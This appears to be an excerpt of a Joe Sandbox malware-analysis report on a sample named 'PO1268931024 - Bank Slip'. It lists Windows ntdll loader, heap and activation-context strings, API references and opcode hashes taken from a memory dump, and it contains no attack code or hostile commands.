                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        Strings
                                                                                                        • HandleTraces, xrefs: 01818C8F
                                                                                                        • VerifierDlls, xrefs: 01818CBD
                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01818A3D
                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01818B8F
                                                                                                        • VerifierDebug, xrefs: 01818CA5
                                                                                                        • VerifierFlags, xrefs: 01818C50
                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01818A67
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                        • API String ID: 0-3223716464
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-792281065
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017E9A11, 017E9A3A
                                                                                                        • apphelp.dll, xrefs: 01786496
                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017E9A01
                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017E9A2A
                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017E99ED
                                                                                                        • LdrpInitShimEngine, xrefs: 017E99F4, 017E9A07, 017E9A30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-204845295
                                                                                                        Strings
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018021BF
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01802178
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01802165
                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01802160, 0180219A, 018021BA
                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0180219F
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01802180
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                        • API String ID: 0-861424205
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017CC6C3
                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01808170
                                                                                                        • LdrpInitializeProcess, xrefs: 017CC6C4
                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01808177, 018081EB
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01808181, 018081F5
                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 018081E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-475462383
                                                                                                        APIs
                                                                                                          • Part of subcall function 017D2DF0: LdrInitializeThunk.NTDLL ref: 017D2DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404860816-0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017C8421
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017C855E
                                                                                                        • LdrpInitializeProcess, xrefs: 017C8422
                                                                                                        • @, xrefs: 017C8591
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        Strings
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018022B6
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 018021DE
                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018021D9, 018022B1
                                                                                                        • .Local, xrefs: 017C28D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                        Strings
                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0180342A
                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01803456
                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01803437
                                                                                                        • RtlDeactivateActivationContext, xrefs: 01803425, 01803432, 01803451
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017F106B
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017F0FE5
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017F1028
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017F10AE
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA9A2
                                                                                                        • apphelp.dll, xrefs: 017B2462
                                                                                                        • LdrpDynamicShimModule, xrefs: 017FA998
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017FA992
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        Strings
                                                                                                        • HEAP: , xrefs: 017A3264
                                                                                                        • HEAP[%wZ]: , xrefs: 017A3255
                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017A327D
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA121
                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 017FA10F
                                                                                                        • LdrpCheckModule, xrefs: 017FA117
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018082E8
                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 018082DE
                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 018082D7
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                        Strings
                                                                                                        • @, xrefs: 0184C1F1
                                                                                                        • PreferredUILanguages, xrefs: 0184C212
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0184C1C5
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        Strings
                                                                                                        • LdrpCheckRedirection, xrefs: 0181488F
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01814899
                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01814888
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01812104
                                                                                                        • LdrpInitializationFailure, xrefs: 018120FA
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018120F3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: #%u
                                                                                                        • API String ID: 48624451-232158463
                                                                                                        Strings
                                                                                                        • LdrResSearchResource Enter, xrefs: 0179AA13
                                                                                                        • LdrResSearchResource Exit, xrefs: 0179AA25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                        • API String ID: 0-4066393604
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `$`
                                                                                                        • API String ID: 0-197956300
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Legacy$UEFI
                                                                                                        • API String ID: 2994545307-634100481
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$MUI
                                                                                                        • API String ID: 0-17815947
                                                                                                        Strings
                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0179063D
                                                                                                        • kLsE, xrefs: 01790540
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                        • API String ID: 0-2547482624
                                                                                                        Strings
                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0179A309
                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0179A2FB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                        • API String ID: 0-2876891731
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: MUI
                                                                                                        • API String ID: 0-1339004836
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID: 0-3916222277
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: GlobalTags
                                                                                                        • API String ID: 0-1106856819
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .mui
                                                                                                        • API String ID: 0-1199573805
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: EXT-
                                                                                                        • API String ID: 0-1948896318
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryName
                                                                                                        • API String ID: 0-215506332
                                                                                                        Strings
                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0181895E
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                        • API String ID: 0-702105204
                                                                                                        • Opcode ID: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                                        • Instruction ID: d2ffa2581a9c7cf945c2de7f69fe33c4a8bc903ff6b5f3d2f0be441228b6bed1
                                                                                                        • Opcode Fuzzy Hash: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                                        • Instruction Fuzzy Hash: B0012B337402059BE7206F5DDCC5A6ABF6EEF83764F04001CF641C6159CF206A84CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 380e57de1df12bc6331ac31d9552d6462041ee8169c0dabbb4354c0497ca3138
                                                                                                        • Instruction ID: ad7b41d94a237d7510542b45558974296d8ef7c83e2f79b5e50ad659febde1da
                                                                                                        • Opcode Fuzzy Hash: 380e57de1df12bc6331ac31d9552d6462041ee8169c0dabbb4354c0497ca3138
                                                                                                        • Instruction Fuzzy Hash: 19429D316083419BE725CF68C890A6BBBE6BFC8704F0C492DFA96D7250D771DA45CB92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a73d676aac71c33aaf5a0de26882e7fc3cb762ffa794bacb32aa8d8e1bc2be02
                                                                                                        • Instruction ID: 52bd382112e84bc16b1905f6782d420ed26b7241e6945e1e89934d74c76920cc
                                                                                                        • Opcode Fuzzy Hash: a73d676aac71c33aaf5a0de26882e7fc3cb762ffa794bacb32aa8d8e1bc2be02
                                                                                                        • Instruction Fuzzy Hash: 16424D75E002298FEF25CF69C885BADBBF5BF49300F148199E949EB242D7349A85CF50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4789ab5b7f25f7482fc8419e5be2635c831ff034af24b45683284839882141b4
                                                                                                        • Instruction ID: 8635092439eec512f6dd50a01201842dc3d992986b7ed185200f6401b1b23195
                                                                                                        • Opcode Fuzzy Hash: 4789ab5b7f25f7482fc8419e5be2635c831ff034af24b45683284839882141b4
                                                                                                        • Instruction Fuzzy Hash: B832BC70A007558BEB25CF69C8447BEFBF2BF84704F24411DE6869B385DB35A942CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                                                                                        • Instruction ID: 1d4ba188e428942faa4dc0d004d249c014300e567f4039eaf916fa95556fd8db
                                                                                                        • Opcode Fuzzy Hash: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                                                                                        • Instruction Fuzzy Hash: 7F22DE742046658BEB29CF2DC094376BBF1AF85304F0C845AE9C6CF286E775D642DBA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                                                                                        • Instruction ID: 1d0c2470e72c6f40f56efc047ec952b317c3a901d92a755a589dd1a22e9e9a05
                                                                                                        • Opcode Fuzzy Hash: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                                                                                        • Instruction Fuzzy Hash: E9328C75A04205CFDF25CFA8D480AAAFBF1FF48310F6486A9EA55AB351D734E845CB50
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction ID: eec81d71b443df8cc976f24c595ad2bca8d41bf519fc4ae858ee2b7a643bee2f
                                                                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                        • Instruction Fuzzy Hash: 13F14071E0021A9BDB15CFA9C594BEEFBF5AF48710F088169EA06AB345E774D841CB60
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9f0091567235fa8f0f7178108df0b8dc6b67e9b27e2a53e2dba899214da06f99
